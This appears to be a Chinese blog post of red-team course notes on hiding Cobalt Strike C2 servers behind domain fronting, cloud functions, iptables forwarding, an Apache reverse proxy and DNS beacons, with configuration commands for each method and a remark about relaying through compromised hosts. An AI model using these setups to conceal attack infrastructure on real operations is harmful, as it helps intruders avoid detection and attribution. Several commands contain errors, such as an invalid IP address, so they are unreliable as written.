156-反溯源隐藏&C2项目&域前置&云函数&数据中转&DNS转发-CSDN博客

本文链接：https://blog.csdn.net/qq_63855540/article/details/142757942

演示案例：

CS-隐藏防朔源-域前置-C2&CDN

CS-隐藏防朔源-云函数-C2&API 触发

CS-隐藏防朔源-DNS 解析-C2&流量伪装

CS-隐藏防朔源-数据转发-C2&Iptables&中间件

接上节课的知识点，上节课只讲了利用CDN进行隐藏的方式

#域前置-CDN 配合

大部分 IDC 不再支持，确切的说是此技术已经落后了很多厂商不再支持这种方式

方式和CDN有点类似也需要有个开启CDN的域名，然后超级ping获取到的CDN节点ip反查出很多的域名，然后在cs生成监听的时候选择host列表中填放反查出来的域名

感觉和第一种讲的CDN方式有一点点区别，在挂了CDN的基础上如何实现更近一步的将我们的域名也进行隐藏

参考

【C2隐匿】域前置/CDN技术

教你配置一个域前置C2隐藏——超详细过程小白理解

#云函数-腾讯云操作

视频中腾讯云的api网关已经下线了。。。该死的黑客

然后我在网上找到了一篇使用百度云函数的文章成功的复现了

基于baidu的云函数实现隐藏c2真实地址-CSDN博客

#端口转发-Iptables

1、转发机设置转发:(80改443即https)

iptables -I INPUT -p tcp -m tcp --dport 80 -j ACCEPT

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 47.941236.117:80

iptables -t nat -A POSTROUTING -MASQUERADE

iptables -I FORWARD -j ACCEPT

iptables -P FORWARD ACCEPT

sysctl net.ipv4.ip forward=1

2、Cs监听器配置转发机IP

这种方式其实就是中间用一个服务器做了一层转发代理，不过可能实战中用肉鸡做转发？不过除了这种方式还有其他的一些代理转发软件也可以实现只是没有iptables隐藏。另外就是用的是ip做的转发如果把ip封了就断了，在实战中拿下一台外网主机在上面做转发可能会不那么快被发现，不过检测的时候如果查看了iptables的转发规则应该会发现真实ip地址。

同时iptables还有其他的一些用法比如端口复用之类的在进内网渗透和权限维持时可以提供很多帮助。

#中间件反向代理-Apache

1、代理机安装Apache:

apt-get install apache2

a2enmod proxy proxy_ajp proxy_balancer proxy_connect proxy_http

systemctl restart apache2

vim /etc/apache2/sites-enabled/000-default.conf

2、中间件设置转发:

http:

ProxyPass "/" "http://CS的IP/"

ProxyPassReverse "/" "http://CS的IP/"

https:

ProxyPass "/" "https://CS的IP/"

ProxyPassReverse "/" "https://CS的IP/"

修改000-default.conf文件添加上面http或者htpps的内容

修改完后需要再次重启

systemctl restart apache2

我这里尝试了确实只能反向代理去寻找ip地址不能使用域名

关闭

a2dismod proxy proxy_ajp proxy_balancer proxy_connect proxy_http

systemctl restart apache2

#DNS协议-域名记录解析

1、域名解析设置A,NS记录

nsl ns cs.xxx.Com

ns2 ns cs.xxx.com

cs A xx.xx.xx.xx(CS的IP)

2、CS监听器-DNS

Beacon DNS

DNS地址配置:

nsl.xxx.Com

ns2.xxx.com

添加解析记录

创建dns的监听器

上线了是这样的

输入checkin唤醒

需要等到一段时间，唤醒后就正常了

后记：

总体来看几种隐藏方式各有应用场景，个人认为云函数在实战中可能效果比较好一些，当然那个域前置如果能搞到一个高信任的域名前置那肯定效果更好。不过要把隐藏完好还得仔细的研究一下cs的profile的写法去自定义特征。

到此红队篇正式完结了，对我来说小迪的课程正式完结了，后续的几个章节当时HVV和挖洞的时候提前看完了，我一开始看的是2021年的版本，后来2022年的版本流出又去看了这个版本，这之间也是断断续续的，内网阶段其实当时还断了很长的一段时间没有学当时换了方向去学习java代码审计，想着学内网没啥用不如学代码审计挖0day哈哈哈，学了发现代码审计这东西也不是一下就可以学会的，没有学过java企业级开发代码审计审不了一点哈哈哈。。。不过也是坚持了一段时间把一些框架啥的学了一些也是有些收获吧，后续又回来学内网篇并且发现网上并没有很多的相关的笔记于是就有了自己写博客的想法（平时自己学习就有记笔记的习惯正好就把自己的笔记发出来也挺好的）。另外小迪的质量是值得肯定的，我也看过暗月的视频说实话自己讲自己的看着没啥意思，还是有节目效果的小迪好看哈哈哈，感谢小迪这一年来的陪伴，也对这一年努力的自己表示肯定😎😎😎。以后进橘子了就说师从小迪哈哈哈。

附上萧瑟迪的一些表情包 🤣🤣🤣